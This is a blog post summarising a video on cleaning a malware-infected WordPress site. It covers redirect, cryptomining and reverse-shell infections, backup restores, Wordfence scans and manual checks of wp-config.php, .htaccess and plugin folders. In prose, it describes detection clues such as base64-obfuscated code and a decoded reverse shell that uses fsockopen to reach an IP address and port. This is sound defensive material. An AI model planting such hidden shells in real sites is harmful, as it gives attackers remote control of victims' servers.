We covered automated and manual methods of scanning and cleaning a WordPress website infected with different types of malware including redirection malware, cryptomining malware and reverse shell. We showed also how to clean an infected wordpress website using WordPress security plugins such as Wordfence.

Part 1: Identifying Infected WordPress Websites

The video explained three common scenarios of WordPress malware infections:

  • Crypto Malware: Your website might appear to function normally. However, I learned to look for significant spikes in server resource consumption, particularly CPU and RAM. This is a tell-tale sign that the malware is secretly using your server’s resources to mine cryptocurrencies.
  • Redirection Malware: This one is quite straightforward. Instead of your website loading as expected, users are abruptly redirected to a different site, often pharmaceutical-related websites (e.g., Viagra).
  • Reverse Shell: Similar to crypto malware, your site might seem to operate normally on the surface. But, behind the scenes, the malware establishes a hidden connection from your server to the attacker’s machine, giving them remote control.

Part 2: Cleaning an Infected Site

The video discussed two main approaches to cleaning an infected WordPress site:

  • Automated Methods: This involves using WordPress security plugins like Wordfence or Sucuri. You perform a full scan with these plugins to identify infected files. You can then choose to manually delete the identified files or let the plugin auto-delete them. However, a crucial caution here: auto-deleting can sometimes risk losing important design elements of your site, so having a clean backup is absolutely essential.
  • Manual Methods: This method requires digging deep into the WordPress root directory (typically /var/www/html). Key files and directories to inspect for malicious code include:
    • wp-config.php: Look for unusual strings or base64 encoded content.
    • index.php: This is especially important if you’re experiencing redirection malware, as malicious redirects are often injected here.
    • wp-content/ directory: Pay close attention to the plugins/ and themes/ subdirectories for oddly named or suspicious files/folders. For example, a plugin folder named something like “391” is a major red flag.
    • .htaccess: Check this file for strange strings or calls to external domains. I also learned that malware is often obfuscated using encoding methods like Base64 to hide its true nature.

Recommended Cleaning Strategy (Prioritized)

The video below strongly recommended a prioritized strategy for cleaning:

  1. Clean Backup Method (Most Effective): If you discover an infection, the best approach is to restore your site from the most recent reliable backup. Always test the backup in a separate environment first to ensure it’s truly clean and functional before deploying it. This method minimizes data loss and ensures a completely clean slate.
  2. Automated Cleaning (Second Option): If a clean backup isn’t available or feasible, use security plugins like Wordfence or Sucuri to scan and remove infected files. Be prepared that you might lose some design elements or saved work, which you’ll need to rebuild.
  3. Manual Cleaning (Last Resort): This should be your final option as it’s very time-consuming and requires significant expertise. It’s also difficult to be 100% certain you’ve removed all traces of the malware manually.

Demonstrations and Practical Insights

The video below provided excellent demonstrations:

  • Using Wordfence for Automated Cleaning: I saw how a Wordfence scan identifies malicious files, including obfuscated strings in index.php and other files. It demonstrated how Wordfence can “repair” files by removing malicious code or “delete” malicious files entirely.
  • Manual File Inspection and Cleaning: I was walked through manually inspecting files like admin.php and options.php (noted as unusual in the root directory) and deleting them due to obfuscated content. I learned how to edit wp-config.php to remove suspicious PHP one-liners and the importance of checking the wp-content/plugins/ directory for unusually named plugin folders and inspecting their contents. The video also highlighted the value of comparing my file structure to a clean WordPress installation.
  • Identifying a Reverse Shell: Finally, the video showed an example of a reverse shell hidden within a plugin file (plugin-manager.php) in the wp-content/plugins/ directory. The malicious code was Base64 encoded. I saw how decoding the string (using a tool like CyberChef) revealed an IP address, port number, and functions like fsockopen, clearly indicating a reverse shell. The solution in this case was simply to delete the infected file.

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles